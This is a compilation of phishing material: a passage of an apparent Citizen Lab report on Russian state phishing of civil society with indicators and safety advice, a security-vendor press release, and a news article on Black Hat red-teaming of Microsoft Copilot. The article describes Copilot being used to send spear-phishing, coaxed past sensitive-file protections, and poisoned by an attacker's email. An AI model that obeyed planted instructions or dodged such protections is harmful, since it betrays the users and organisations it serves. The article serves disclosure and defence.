df9d77f3e608c92ef899e5acd1d65d87ce2fdb9aab63bbf58e63e6fd6c768ac3	Haylie Wolf	LibreOffice 7.0	en-US

In addition to the PDF document metadata overlap, we observed substantial visual and content similarities in the PDFs. For example, RoP Example 1 shares bait text with this COLDRIVER-attributed text, and RoP Example 2 includes a variant on the filename used in the COLDRIVER-attributed PDF (See: Figure 2).

Figure 6: Two River of Phish PDFs and one COLDRIVER PDF (Note: The Example 1 screenshot has been redacted to remove the name of an impersonated organization).

Phishing Infrastructure Overlaps

In addition to the highly similar PDF content, phishing infrastructure linked from RoP bait PDFs showed substantial overlaps between the RoP campaign and COLDRIVER. The COLDRIVER-attributed PDFs contained links to multiple phishing domains (For example, See: Table 5).


Domain	Registered	Registrar	Certificate Issuer
togochecklist[.]com	2023-08-28	NameCheap	Let’s Encrypt
vocabpaper[.]com	2024-03-15	Hostinger	Let’s Encrypt
matalangit[.]org	2024-05-07	Hostinger	ZeroSSL

The COLDRIVER phishing domain registration patterns exhibited similar characteristics to the ones we identified, such as registration using Hostinger and TLS certificates issued by Let’s Encrypt or ZeroSSL.


Registrars	Namecheap, Hostinger	Namecheap, Hostinger, others
TLS Certificate Issuers	ZeroSSL, Let’s Encrypt	ZeroSSL, Let’s Encrypt, others

In addition, reporting shared by PwC detailed recent COLDRIVER activity and validated our attribution of both PDFs and domains from this campaign.

Additional TTP Overlap with Prior Public Reporting on COLDRIVER

Additionally, we noted that River of Phish employed a number of known TTPs of COLDRIVER.

The social engineering and spear-phishing delivery methodology remained consistent across past COLDRIVER activity and the current campaign we are tracking. These methods include:

Impersonating a known individual by setting up a Proton Mail account using their name;
Using information gained through reconnaissance to tailor the message in the initial email to make it look more authentic;
Employing language indicating a desire to collaborate on a shared area of interest; and
Using a fake password protected/encrypted PDF with the content blurred in the preview.

In one case, a RoP PDF features the text “Hmm… looks like this file doesn’t have a preview we can show you” (an error message shown by multiple Microsoft services when a file is not previewable), and a 2023 PDF from COLDRIVER features the identical text (Figure 4).

PDF sent in a campaign reported by Microsoft in December 2023 (left); PDF from the River of Phish campaign (right).

Finally, a PDF sent to one of the targets we examined contains multiple RoP elements, as well as an additional element previously associated with COLDRIVER. Specifically, the PDF contained an embedded link using a Customer Relationship Management (CRM) service previously reported as used by COLDRIVER, rather than a direct link to actor-registered infrastructure. In almost all other aspects, the document matched the RoP campaign. The PDF was sent in March 2024 and named “RS_version 1.3.pdf”. The email sender masqueraded as a retired US official seeking comment on a report on Ukraine. Language in the email describing a purported report and requesting a review was identical to other RoP emails. The attached PDF matched all RoP metadata, and the name used variants on the “RS” and “Draft 1.3” naming observed in multiple RoP PDFs (See: Figure 2). However, unlike the other PDFs that included a direct link to a first-stage domain, this file included a link through HubSpot, a CRM provider.

In 2023 Microsoft identified COLDRIVER as a HubSpot user, and specifically noted the practice of embedding HubSpot domains in the targeting PDF in an attempt to evade detection.

River of Phish: Signs of Continued Evolution?

In addition to the previous use of HubSpot, earlier COLDRIVER reporting mentioned clusters of domains named around a particular theme or service being impersonated, such as proton-docs[.]com, proton-reader[.]com, and proton-viewer[.]com, reported by Microsoft in 2022. However, both Microsoft and Recorded Future noted that COLDRIVER appeared to be using a “more randomized” domain generation mechanism starting in 2023, suggesting adaptation to previous detection techniques and an effort to hide targets. RoP first-stage infrastructure did not include any themes in domain naming. However, we note that our report focuses specifically on civil society clusters, and thus it is possible that COLDRIVER is using other domain naming schemas against other targets.
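The contrast between themed and randomized domain naming can be illustrated with a short sketch. This is not a method described in the report: the function name `themed_clusters` and the rule of grouping on the token before the first hyphen are assumptions chosen only to show how the 2022 "proton-" cluster stands out while the RoP first-stage domains do not.

```python
from collections import defaultdict


def themed_clusters(domains, min_size=2):
    """Group domains by the token before the first hyphen in the leftmost label.

    Hypothetical heuristic for illustration only: it accepts defanged
    ("[.]") or plain domains and looks only at the leftmost label.
    """
    groups = defaultdict(list)
    for domain in domains:
        label = domain.replace("[.]", ".").lower().split(".")[0]
        if "-" in label:
            groups[label.split("-")[0]].append(domain)
    # Keep only themes shared by at least `min_size` domains.
    return {theme: members for theme, members in groups.items()
            if len(members) >= min_size}


# Domains quoted in the text above and in the appendix.
older = ["proton-docs[.]com", "proton-reader[.]com", "proton-viewer[.]com"]
rop = ["ithostprotocol[.]com", "xsltweemat[.]org", "egenre[.]net"]

print(themed_clusters(older))  # one cluster keyed by "proton"
print(themed_clusters(rop))    # no clusters
```

A heuristic this simple would miss themes that are not hyphen-delimited, so an empty result is weak evidence at best.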

Previous reporting also identified COLDRIVER domains registered through Namecheap. During this campaign we observed that the domain registrar of choice changed to Hostinger sometime between January and March of 2024. PwC reporting highlighted that COLDRIVER previously used Hostinger as a registrar in 2022; however, more evidence is needed to determine whether this is a change that will persist across future COLDRIVER activity.

In addition to the analysis in this section, we have also developed a YARA rule (See: Appendix) that will assist other researchers in identifying other PDF files likely attributable to River of Phish / COLDRIVER.

4. COLDWASTREL: A New Threat Actor Surfaces?

In March 2023, our investigative partner Access Now began receiving cases of personalized phishing. The first were shared by the Russian human rights organization First Department. Access Now shared the cases with the Citizen Lab. Superficially, the messages had much in common with COLDRIVER. For example, the attacker sent PDF attachments with references to ProtonMail and ProtonDrive designed to trick targets into clicking on a link. However, close analysis revealed numerous differences, ultimately leading us to conclude that these were the work of a separate threat actor.

Consistent Differences Between Bait PDFs

This campaign deviates in several important aspects from COLDRIVER, such as the characteristics of the malicious PDF (see Table 7) and front-end infrastructure. At this time, we assess that this activity cluster is not the work of the COLDRIVER operator and warrants further investigation.

	COLDRIVER	COLDWASTREL
PDF Version	1.4	1.5
PDF Language	en-US	ru-RU
PDF Author	Plausible-yet-obscure English language names	“User”
Links in PDF	Unique to each PDF	Consistent across multiple targets
Links in PDF	Redirected to fingerprint, then to separate domain/site to gather credentials	Hosted the phishing kit directly.
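The metadata rows of Table 7 can be expressed as a simple comparison. The sketch below is illustrative only: the `PdfMetadata` type and `cluster_hint` function are hypothetical names, the metadata is assumed to have been extracted already by some other tool, and a match is a weak hint rather than an attribution.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class PdfMetadata:
    version: str   # PDF version, e.g. "1.4"
    language: str  # document language tag, e.g. "en-US"
    author: str    # author field, e.g. "Alexis Hill"


def cluster_hint(meta: PdfMetadata) -> str:
    """Return which Table 7 column the metadata resembles, if any."""
    if meta.version == "1.5" and meta.language == "ru-RU" and meta.author == "User":
        return "COLDWASTREL-like"
    # Table 7 describes COLDRIVER authors as plausible English names;
    # here that is approximated crudely as "anything other than 'User'".
    if meta.version == "1.4" and meta.language == "en-US" and meta.author != "User":
        return "COLDRIVER-like"
    return "unknown"


print(cluster_hint(PdfMetadata("1.4", "en-US", "Alexis Hill")))
print(cluster_hint(PdfMetadata("1.5", "ru-RU", "User")))
```

Metadata of this kind is trivial for an operator to change, so a check like this is only useful alongside the link and infrastructure differences listed in the same table.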

Our colleagues at Access Now have identified an additional COLDWASTREL PDF on VirusTotal which we include here to assist other researchers in pursuing this threat actor.

COLDWASTREL PDF on VirusTotal

Infrastructure Differences

In addition to the differences in the PDF content and metadata, there were several other notable differences between the two attacks:

All pre-2024 COLDWASTREL PDFs contained a link to the same domain, protondrive[.]online. This tactic deviates from the COLDRIVER activity that we investigated, which seemed to use a different domain for each PDF, without making use of a lookalike domain.
The domain protondrive[.]online also differs from the infrastructure seen with COLDRIVER. The domain was registered through URL Solutions Inc, which deviates from the RoP/COLDRIVER TTPs described above.

Together with Access Now, we are referring to this operator as COLDWASTREL. We hope that other research teams will be able to advance this investigation further using indicators provided in Access Now’s report. While we are not attributing this campaign, and have only a limited number of targets, we note that the COLDWASTREL targeting that we have observed does appear to align with the interests of the Russian government.

Fresh COLDWASTREL?

Shortly before publication of this report, we tentatively identified what appears to be renewed COLDWASTREL targeting, based on TTPs, targeting overlap, and infrastructure similarity. In this attack, the decoy PDF included the domain protondrive[.]me which, when clicked, redirected to phishing hosted at protondrive[.]services.

An August 2024 COLDWASTREL phishing page. The prepopulated email address of the target has been redacted.

5. Why Do Some Governments Still Phish?

Governmental threat actors, including in states that possess a high degree of technical competency (e.g. reserves of zero-day exploits), continue to phish because personalized phishing still works. When the cost of discovery remains low, phishing remains not only an effective technique, but a way to continue global targeting while avoiding exposing more sophisticated (and expensive) capabilities to discovery.

Threat actors like the FSB are equipped with substantial intelligence gathering and analytical capabilities. They possess a detailed window into potential targets’ relationships and work activities which enables operators to craft very credible phishing lures. Research shows that phishing leveraging personal information has a much higher probability of success, and we speculate that a mature phishing campaign against a longstanding target benefits from a positive feedback loop in which more cycles of phishing yield ever-more detailed information that can be used to create increasingly convincing lures for future victims.

Where we do see evolution and tactical cleverness from COLDRIVER, it remains just enough to bypass certain modes of discovery. For example, in the River of Phish campaign, we see a wide range of paired sender names, domains, and PDF metadata. It is possible that these pairings are each used for only a very small number of targets. This approach may indicate efforts to evade detection by popular email platforms.

As platform and endpoint security continues to thwart attacks, attackers must rely on increasingly sophisticated social engineering that can be hard to distinguish from normal communications. Confirming the authenticity of the message and sender will protect both parties, and is well worth the extra time and effort. As COLDRIVER’s operators must know, this is not a practical action for every message.

Smash & Grab Phishing?

Numerous features of COLDRIVER’s activities increase the chance of a successful compromise while also increasing the chance that a sophisticated target or analyst will identify the communications as malicious.

For example, impersonating an individual known to the target increases the likelihood of discovery because the target can usually contact the impersonated individual to inquire whether the communication is authentic. This chance of discovery is compounded by the use of a bait document ruse that is also likely to lead to puzzled victims, reports, and eventual discovery.

This sort of social engineering tactic is well suited to a persistent adversary that does not face reputational or criminal penalties from discovery. For example, the operators of COLDRIVER presumably enjoy the protection of the Russian government, and know better than to schedule a holiday at Disney World in Florida.

While the volume of past reporting on COLDRIVER has probably disrupted specific campaigns, it is unlikely to put a stop to their activity. Indeed, we see evidence that the operator makes minimal changes in their tactics in response to disruptions. Such changes buy them a modest window of time to continue targeting even though a degree of discovery, including further exposure by researchers and even governments, remains inevitable.

6. The Russian Cyber Espionage Landscape

Russia has a long history of espionage that reaches back to pre-Soviet times, and has engaged in cyber espionage campaigns and active cyber operations for decades. These operations have been extensively studied by academics, civil society organizations, journalists, governments and the commercial cybersecurity community. Generally, Russian cyber espionage and active cyber operations are undertaken independently by multiple (and sometimes competing) state security agencies, occasionally with the participation of organized criminal groups or other private sector entities (e.g., NTC Vulkan, RomCom, Cadet Blizzard).

There are several Russian and Russian-aligned entities that undertake or are responsible for cyber espionage. Russia’s foreign intelligence service, the SVR (Sluzhba Vneshney Razvedki), is responsible for foreign intelligence gathering and is generally known for long-term espionage campaigns such as those publicly referred to as APT29, “Cozy Bear” or “The Dukes.” SVR-linked campaigns have typically involved accessing credentials of targeted entities through password spraying, brute forcing, and other means of accessing cloud and other accounts.

Russia’s main intelligence directorate of the armed forces, the GRU, is associated with cyber espionage and cyberwarfare operations designated as APT28, Fancy Bear, and Sandworm, and has been linked to DDoS and disruptive malware attacks on critical infrastructure, the financial sector, government and non-governmental organizations, and other sectors. The US, UK and other Western governments have also linked this entity to the compromise of edge routers in order “to host spear-phishing landing pages and custom tools.”

Meanwhile, Russia’s FSB has responsibilities covering internal security, counterintelligence, and foreign espionage. Two units within the FSB, Centre 16 and Centre 18, are responsible for cyber espionage, with the activities of COLDRIVER falling under the umbrella of the latter. According to a UK government assessment, Centre 18 is also known as the Centre for Information Security (TsIB) Military Unit 64829.

7. Civil Society Targeting by Russia: Always Present

Cyber espionage campaigns and active cyber operations targeting government entities, critical infrastructure, businesses and financial institutions have traditionally received the bulk of commercial cybersecurity firms’ and media attention. However, this selection bias arising from commercial priorities has produced a distorted view of the overall victim set. Until recently, attacks targeting civil society tended to be overlooked in industry and government reporting because civil society lacks the resources to pay for high-end services, which means that indicators that might be gleaned from civil society may be largely unseen by cybersecurity firms.

A major takeaway of the last decade and a half of the Citizen Lab’s research into digital espionage is that civil society is a major and often overlooked segment, despite being targeted by the same groups that attack government and industry. Authoritarian governments are particularly sensitive to political opposition, dissidents and investigative journalism and routinely orient their cyber espionage campaigns towards groups involved in those activities, both at home and abroad. Cyber espionage against civil society is also a major component of digital transnational repression, which has been growing in scope and scale worldwide.

In 2017, for example, the Citizen Lab published a report detailing a Russia-aligned hack and leak operation, which we called “Tainted Leaks.” The investigation detailed an extensive phishing operation targeting 200 unique individuals across 39 countries. Those targets included senior government and military officials, CEOs of energy companies, and civil society. We discovered that civil society targets, including academics, journalists, activists, and members of NGOs, represented the second largest cluster set (21%), after government officials. Although we could not attribute that operation to a single entity, there were several indicators suggesting links to APT28, a Russian threat actor affiliated with the GRU.

These cyber attacks targeting civil society are gaining wider visibility, thanks in part to more than 10 years of reporting by the Citizen Lab, Access Now, Amnesty International, investigative journalists, and media consortia. The US, UK, Canada and other Western governments, as well as cybersecurity firms, have formally acknowledged the frequency of cyber espionage and cyber operations against civil society and the risks they pose, now echoing civil society’s reporting.

Other Digital Threats to Civil Society Groups Working On and In Russia

Civil society is under extreme threat in Russia. A recent study conducted by the Justice for Journalists Foundation counts a total of 5,262 cases of attacks/threats against professional and civilian media workers and editorial offices of traditional and online media, as well as against Russian journalists abroad in 2021-2023.

For those still residing inside the country, the threat of raids and seizure of equipment is ever-present. Russia is currently among the top five countries in the world for arrests of journalists. In addition, the threat of physical violence for those located both inside and outside Russia is constant, with journalists and civil society figures regularly beaten, tortured, poisoned, and imprisoned. Prominent opposition voices have been killed, or have died in custody. Russia is known for its “highly aggressive” practice of transnational repression, which involves the targeting of dissidents, human rights defenders, and other civil society members living in exile/outside Russia through different methods including poisonings and killings.

Beyond these physical threats, civil society groups operating inside Russia, in exile, or other groups working on Russian issues face a wide range of digital threats. A large number of civil society groups and independent media organizations have moved into exile since the 2022 full-scale invasion of Ukraine by Russia. Today, many organizations-in-exile operate in a geographically dispersed and decentralized manner, making them dependent on online communications. The critical dependence on technology combined with frequent resource constraints makes these groups exceptionally vulnerable to a wide range of digital threats.

Communications and information in Russia are subject to an extensive censorship regime, impacting the ability of audiences within Russia to access information and blocking the flow of information out of Russia. These restrictions include direct censorship of websites and social media platforms and blocking of specific communications protocols such as VPNs. This blocking also hampers organizing and coordination between domestic and foreign civil society organizations. For example, a 2023 Citizen Lab report on the Russian social networking site VK discovered that the platform “blocked content posted by independent news organizations, as well as content related to Ukrainian and Belarusian issues, protests, and lesbian, gay, bisexual, transgender, intersex, and queer (LGBTIQ) content.”

Threats & Harassment

Prominent critics of the regime, antiwar activists, and independent media regularly face extensive intimidation and harassment campaigns both in and outside of Russia. These campaigns may include highly targeted online threats, backed by meticulous research into the personal details and surveillance of the target.

Indirect Censorship Through Malicious Reporting and Pressuring Tech Platforms

Prominent regime targets are often subjected to extensive and coordinated campaigns to report social media accounts and posts on platforms, like Instagram and Facebook, with the goal of triggering account suspensions and post deletions. For example, a prominent Russian researcher and antiwar activist who spoke with us counted 83 complaints against her Instagram account submitted in a single 11-hour period in July 2024. The Russian government has also reportedly applied pressure on companies like Apple and Google to delete opposition and VPN apps, as well as civil society YouTube videos.

Account Takeovers and Honeypots

Beyond the sophisticated social engineering described in this report, popular chat programs, such as Telegram, are regularly targeted with a range of tactics for account hijacking and takeovers.

The tactics used to target accounts and private information are too numerous to list and are constantly evolving. For example, the co-founder of a Russian NGO that assists imprisoned antiwar activists described to us a new attack technique which relies on a fake Telegram “Helpline bot” impersonating the project of a genuine non-governmental organization. Such a fake helpline could be easily used to gather account information and identifying details from at-risk activists inside Russia, potentially as a precursor to eliciting sensitive information or account takeovers.

8. Protect Yourself & Your Colleagues

We believe that COLDRIVER and other Russian-government backed threat actors will persist in targeting civil society. While large email platforms continue to track and seek to disrupt these operators, this case shows that attacks can still make it through their defenses and into inboxes.

Do you think you have been targeted by COLDRIVER, COLDWASTREL or other kinds of personalized phishing? We encourage you to contact Access Now’s Digital Security Helpline to seek assistance.

Do you think that COLDRIVER or similar governmental phishing groups may target you in the future? If so, we encourage you to review the steps below. However, these recommendations are not comprehensive, and there is no substitute for seeking expert assistance from competent professionals such as Access Now’s Helpline.

The following recommendations have been prepared jointly by Access Now and the Citizen Lab:

Start with prevention

Use two-factor authentication, correctly: Experts agree that setting up two-factor authentication (2FA) is one of the most powerful ways to protect your account from getting hacked.

However, hackers like COLDRIVER and COLDWASTREL may try to trick you into entering your second factor; we have seen attackers successfully compromise a victim who had enabled 2FA. People using SMS-messaging as their second factor are also at greater risk of having their codes stolen, if a bad actor takes over their phone account.

We recommend that people use more advanced 2FA options such as security keys or, if they are Gmail users, Google Passkeys. Here are four guides for increasing the level of security for your account:

Get Google Passkeys (Google)
How to: Enable two-factor authentication (Electronic Frontier Foundation)
Set up multi factor authentication (Consumer Reports)
Use a security key (Consumer Reports)

Enroll in programs for high-risk users. Google and some other providers offer optional programs for people who, because of who they are or what they do, may face additional digital risks. These programs not only increase the security of your account, but also flag to companies that you may face more sophisticated attacks. Such programs include:

Google Advanced Protection
Microsoft Account Guard
Proton Sentinel

Received a message? Be a five second detective

Step one: check your inbox for the sender’s email. Ask yourself if you have received messages from this account before. COLDRIVER often uses lookalike emails to impersonate people known to the target either personally or professionally, so you may see an email that appears to come from someone you know, writing about something you would expect them to write about. Even if you have received previous messages from the same email address, it is possible to “spoof” a familiar looking email address, so move on to the next step.
Step two: check with the sender over a different medium. If you have any concerns or are at all suspicious, do not open any PDF attachment or click on any link sent in the email. Instead, check directly with the purported sender, via another service, to confirm whether or not they’ve reached out to you. If you don’t already have direct contact with them, consider asking someone you trust to inquire on your behalf.
Step three: if you are viewing an attached document inside your webmail, you should remain careful. Don’t just click on any links; copy and paste them into your browser before visiting. Examine the domain carefully: Is it what you would expect for the site you expect to be visiting? Advanced phishing kits are very good at impersonating popular services, and often the only visual clue that it is not the authentic site will be in the address bar of the browser.
If you see a “login page” pop up, stop. This is a good time to consult a trusted expert.
Step four: beware of “encrypted” or “protected” PDFs. This kind of message is almost always a cause for concern. Legitimately encrypted PDFs almost never include a single “click here” button inside the PDF, and they don’t show a blurred version of the contents. Never click on any “login” links or “buttons” inside a PDF you have been sent.
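The advice to examine the domain carefully can be made concrete with a small sketch. It is illustrative only: `host_matches` is a hypothetical helper, the expected domain is something the reader must already know and supply, and the lookalike URLs in the example are invented under reserved `.example` names.

```python
from urllib.parse import urlparse


def host_matches(url: str, expected_domain: str) -> bool:
    """True only if the URL's host is expected_domain or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    expected = expected_domain.lower()
    return host == expected or host.endswith("." + expected)


# The real service domain passes; lookalikes that merely contain the
# brand name do not (the lookalike hosts below are made up).
print(host_matches("https://drive.proton.me/urls/abc", "proton.me"))
print(host_matches("https://proton.me.login.example/urls/abc", "proton.me"))
print(host_matches("https://service-proton.example/login", "proton.me"))
```

The comparison is made on the full hostname suffix, because a phishing domain can place a trusted brand name anywhere else in the address. A passing check does not make a link safe; it only rules out one common trick.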

Considering Online Virus Checking Sites? You may wish to use online virus scanning sites such as VirusTotal or Hybrid Analysis to check suspicious links or files.

These services offer a useful service and can be part of a good security practice, but they come with a very important caveat: when you use such free services, you are not the customer, you are the product. Your files are available to many researchers, companies, and governments.
We do not recommend using such tools to check “sensitive” files that may contain personal information or other private topics. Instead, contact a trusted expert that can help.

Think you are being targeted?

These recommendations address the kind of phishing that COLDRIVER and COLDWASTREL are currently using, but there are many other ways you could be targeted. Whatever your level of risk, we encourage you to get personalized security recommendations from the Security Planner, which also maintains a list of emergency resources and advanced security guides.

If you suspect that you have already been targeted in an attack, reach out to a trusted practitioner for advice. It is crucial to evaluate any damage to your organization and/or to other related organizations and individuals, such as partners, participants, grantees, and others. If this is the case, keep them informed about what has happened, what has been leaked, how this may impact them, and what steps you are taking to mitigate this impact.

If you believe you have been compromised: Access Now’s Digital Security Helpline is available to support members of civil society, including activists, media organizations, journalists, and human rights defenders, 24/7 in nine languages, including Russian.

Change your password right away. If you are using the same password for other accounts, you should change the password for those accounts, too. Consider using a password manager to keep track of multiple passwords.
You can also review access logs on your accounts, such as Proton Mail’s Authentication Logs, Gmail’s Last Account Activity and review devices with account access, as well as Microsoft’s Check recent sign-in activity. Some users may still have questions after reviewing these logs. We encourage you to make a copy of the logs if you suspect you may have been targeted, to share with an expert for review.

Acknowledgments

The Citizen Lab would like to express our deepest gratitude to the many targets and organizations with suspect messages that consented to share indicators and materials with us, and discuss their experiences. Without their participation, this investigation would have been impossible.

We would also like to thank many researchers and threat intelligence teams for feedback, including the teams at Mandiant, Microsoft Threat Intelligence Center, Proofpoint, and PwC.

We also thank Friendly Robot and TNG.

Thanks to our Citizen Lab colleagues Siena Anstis, Jakub Dalek, Bill Marczak, and Adam Senft for their careful review and editorial assistance, Mari Zhou for graphical assistance and report art, and Snigdha Basu and Alyson Bruce for communications support.

Appendix: Indicators of Compromise

COLDRIVER PDF Hashes

b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d

0ded441749c5391234a59d712c9d8375955ebd3d4d5848837b8211c6b27a4e88

efa2fd8f8808164d6986aedd6c8b45bb83edd70ca4e80d7ff563a3fbc05eab89

c1fa7cd73a14946fc760a54ebd0c853fab24a080cbf6b8460a949f28801e16fc

603221a64f2843674ad968970365f182c228b7219b32ab3777c265804ef67b0a

df9d77f3e608c92ef899e5acd1d65d87ce2fdb9aab63bbf58e63e6fd6c768ac3

384d3027d92c13da55ceef9a375e8887d908fd54013f49167946e1791730ba22

79f93e57ad6be28aae62d14135140289f09f86d3a093551bd234adc0021bb827

00664f72386b256d74176aacbe6d1d6f6dd515dd4b2fcb955f5e0f6f92fa078e
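One way a researcher might use the hashes above is to compare them against the SHA-256 digest of a file that is already in hand. The sketch below is a minimal illustration, not tooling from the report: the function names are hypothetical, and only a subset of the listed hashes is included for brevity.

```python
import hashlib

# Subset of the COLDRIVER PDF hashes listed above (SHA-256, lowercase hex).
COLDRIVER_PDF_SHA256 = {
    "b07d54a178726ffb9f2d5a38e64116cbdc361a1a0248fb89300275986dc5b69d",
    "0ded441749c5391234a59d712c9d8375955ebd3d4d5848837b8211c6b27a4e88",
    "efa2fd8f8808164d6986aedd6c8b45bb83edd70ca4e80d7ff563a3fbc05eab89",
}


def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_ioc(hex_digest, iocs=COLDRIVER_PDF_SHA256):
    """Case-insensitive membership test against the indicator set."""
    return hex_digest.lower() in iocs
```

Hashing happens locally, so this avoids uploading a possibly sensitive file to a third-party scanning service. A non-match says little, since each bait PDF may be unique to a target.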

YARA Rule for River of Phish PDFs

COLDRIVER First-stage Domains

ithostprotocol[.]com

xsltweemat[.]org

egenre[.]net

esestacey[.]net

ideaspire[.]net

eilatocare[.]com

vocabpaper[.]com

matalangit[.]org

togochecklist[.]com

4a9a2c2926b7b8e388984d38cb9e259fb4060cccc2d291c7910be030ae5301a3

COLDWASTREL Domains

protondrive[.]online

protondrive[.]services (tentative)

protondrive[.]me (tentative)

service-proton[.]me (Per Access Now’s analysis)
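The domains above are written in defanged form ("[.]") so they cannot be clicked by accident. A defender who wants to search their own link or proxy logs for them needs to restore the dots first. The sketch below shows one possible approach; `refang` and `urls_matching_iocs` are hypothetical names, and the log entries are assumed to be full URLs.

```python
from urllib.parse import urlparse


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' into 'example.com'."""
    return indicator.replace("[.]", ".").strip().lower()


def urls_matching_iocs(urls, defanged_iocs):
    """Return the URLs whose host equals, or is a subdomain of, a listed domain."""
    iocs = {refang(item) for item in defanged_iocs}
    hits = []
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if any(host == ioc or host.endswith("." + ioc) for ioc in iocs):
            hits.append(url)
    return hits


# A few indicators copied from the lists above, kept defanged in source.
iocs = ["vocabpaper[.]com", "matalangit[.]org", "protondrive[.]online"]
log = ["https://" + refang(iocs[0]) + "/doc", "https://example.org/report.pdf"]
print(urls_matching_iocs(log, iocs))
```

Keeping the indicators defanged in the source and refanging only in memory reduces the chance that a tool or chat client turns them into live links.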

Unless otherwise noted this site and its contents are licensed under a Creative Commons Attribution 2.5 Canada license.

File-Sharing Phishing Attacks Surge 350%, According to New Research from Abnormal Security

Threat actors increasingly exploit file sharing services to advance phishing attacks, while continuing to scale traditional BEC attacks by 50% over the last year

SAN FRANCISCO, August 14, 2024 - Abnormal Security, the leader in AI-native human behavior security, today released its H2 2024 Email Threat Report, revealing the growing threat of file-sharing phishing attacks, whereby threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware.

Sophisticated File-sharing Phishing Attacks on the Rise

Examining data collected between June 2023 and June 2024, Abnormal saw file-sharing phishing volume more than triple, increasing 350% over the year. The majority of these attacks were sophisticated in nature, with 60% exploiting legitimate domains, most commonly webmail accounts, such as Gmail, iCloud, and Outlook; productivity and collaboration platforms; file storage and sharing platforms like Dropbox; and e-signature solutions like Docusign.

“The trust that people place in these kinds of services—especially those with recognizable brand names—makes them the perfect vehicle for launching phishing attacks,” said Mike Britton, chief information security officer at Abnormal Security. “Very few companies block URLs from these services because they aren’t inherently malicious. And by dispatching phishing emails directly from the services themselves, attackers hide in plain sight, making it harder for their targets to distinguish between legitimate and malicious communications. And when attackers layer in social engineering techniques, identifying these attacks becomes near-impossible.”

Finance and Built Environment Firms are Most Vulnerable

The finance industry was found to be most at risk, with file sharing phishing attacks making up one in ten attacks. As financial institutions rely on file-sharing platforms to securely exchange documents, attackers have ample opportunities to slip in a fraudulent file-sharing notification among the sea of invoices, contracts, investment proposals, and regulatory updates.

The second most vulnerable industry was construction and engineering, followed by real estate and property management companies. These sectors not only rely heavily on frequent document transfers via file-sharing platforms, but also involve time-sensitive projects with large payouts. By exploiting the urgency of these exchanges, attackers have an opportunity to send file-sharing phishing attacks that appear time-critical and blend in seamlessly with legitimate emails.

BEC and VEC Remain Persistent Threats

The biannual report also revealed the continued growth of business email compromise (BEC) and vendor email compromise (VEC) attacks:

BEC attacks grew by more than 50% over the last year, with attacks on smaller organizations jumping nearly 60% in the last half.

41% of Abnormal customers were targeted by VEC each week in the first half of 2024, a slight increase over the 37% targeted in the second half of 2023.

Construction and engineering firms, as well as retailers and consumer goods manufacturers, were most vulnerable to VEC attacks, with 70% of organizations receiving at least one VEC attack in the first half of the year.

Britton continued, “Cybercriminals are continuing to use email to target human behavior, and through a variety of techniques—whether it’s leveraging social engineering tactics for BEC, or using the guise of legitimate applications in their phishing schemes. The report findings underscore this deliberate shift away from overt payloads and threat signatures, and toward email attacks designed to manipulate behavior. Keeping up with these threats will require organizations to adapt accordingly, recentering their defenses on protecting humans as their most vulnerable endpoints.”

The full H2 2024 Email Threat Report is titled “Bait and Switch: File-Sharing Phishing Attacks Surge 350%”.

About Abnormal Security

Abnormal Security is the leading AI-native human behavior security platform, leveraging machine learning to stop sophisticated inbound attacks and detect compromised accounts across email and connected applications. The anomaly detection engine leverages identity and context to understand human behavior and analyze the risk of every cloud email event—detecting and stopping sophisticated, socially-engineered attacks that target the human vulnerability.

You can deploy Abnormal in minutes with an API integration for Microsoft 365 or Google Workspace and experience the full value of the platform instantly. Additional protection is available for Slack, Workday, Salesforce, ServiceNow, Zoom, Amazon Web Services and multiple other cloud applications.


Microsoft’s AI Can Be Turned Into an Automated Phishing Machine

Microsoft raced to put generative AI at the heart of its systems. Ask a question about an upcoming meeting and the company’s Copilot AI system can pull answers from your emails, Teams chats, and files—a potential productivity boon. But these exact processes can also be abused by hackers.

Today at the Black Hat security conference in Las Vegas, researcher Michael Bargury is demonstrating five proof-of-concept ways that Copilot, which runs on its Microsoft 365 apps, such as Word, can be manipulated by malicious attackers, including using it to provide false references to files, exfiltrate some private data, and dodge Microsoft’s security protections.

One of the most alarming displays, arguably, is Bargury’s ability to turn the AI into an automatic spear-phishing machine. Dubbed LOLCopilot, the red-teaming code Bargury created can, crucially only once a hacker has access to someone’s work email, use Copilot to see who you email regularly, draft a message mimicking your writing style (including emoji use), and send a personalized blast that can include a malicious link or attached malware.

“I can do this with everyone you have ever spoken to, and I can send hundreds of emails on your behalf,” says Bargury, the cofounder and CTO of security company Zenity, who published his findings alongside videos showing how Copilot could be abused. “A hacker would spend days crafting the right email to get you to click on it, but they can generate hundreds of these emails in a few minutes.”

That demonstration, as with other attacks created by Bargury, broadly works by using the large language model (LLM) as designed: typing written questions to access data the AI can retrieve. However, it can produce malicious results by including additional data or instructions to perform certain actions. The research highlights some of the challenges of connecting AI systems to corporate data and what can happen when “untrusted” outside data is thrown into the mix—particularly when the AI answers with what could look like legitimate results.

Among the other attacks created by Bargury is a demonstration of how a hacker, who again must already have hijacked an email account, can gain access to sensitive information, such as people’s salaries, without triggering Microsoft’s protections for sensitive files. When asking for the data, Bargury’s prompt demands that the system not provide references to the files the data is taken from. “A bit of bullying does help,” Bargury says.

In other instances, he shows how an attacker—who doesn’t have access to email accounts but poisons the AI’s database by sending it a malicious email—can manipulate answers about banking information to provide their own bank details. “Every time you give AI access to data, that is a way for an attacker to get in,” Bargury says.

Another demo shows how an external hacker could get some limited information about whether an upcoming company earnings call will be good or bad, while the final instance, Bargury says, turns Copilot into a “malicious insider” by providing users with links to phishing websites.

Phillip Misner, head of AI incident detection and response at Microsoft, says the company appreciates Bargury identifying the vulnerability and says it has been working with him to assess the findings. “The risks of post-compromise abuse of AI are similar to other post-compromise techniques,” Misner says. “Security prevention and monitoring across environments and identities help mitigate or stop such behaviors.”

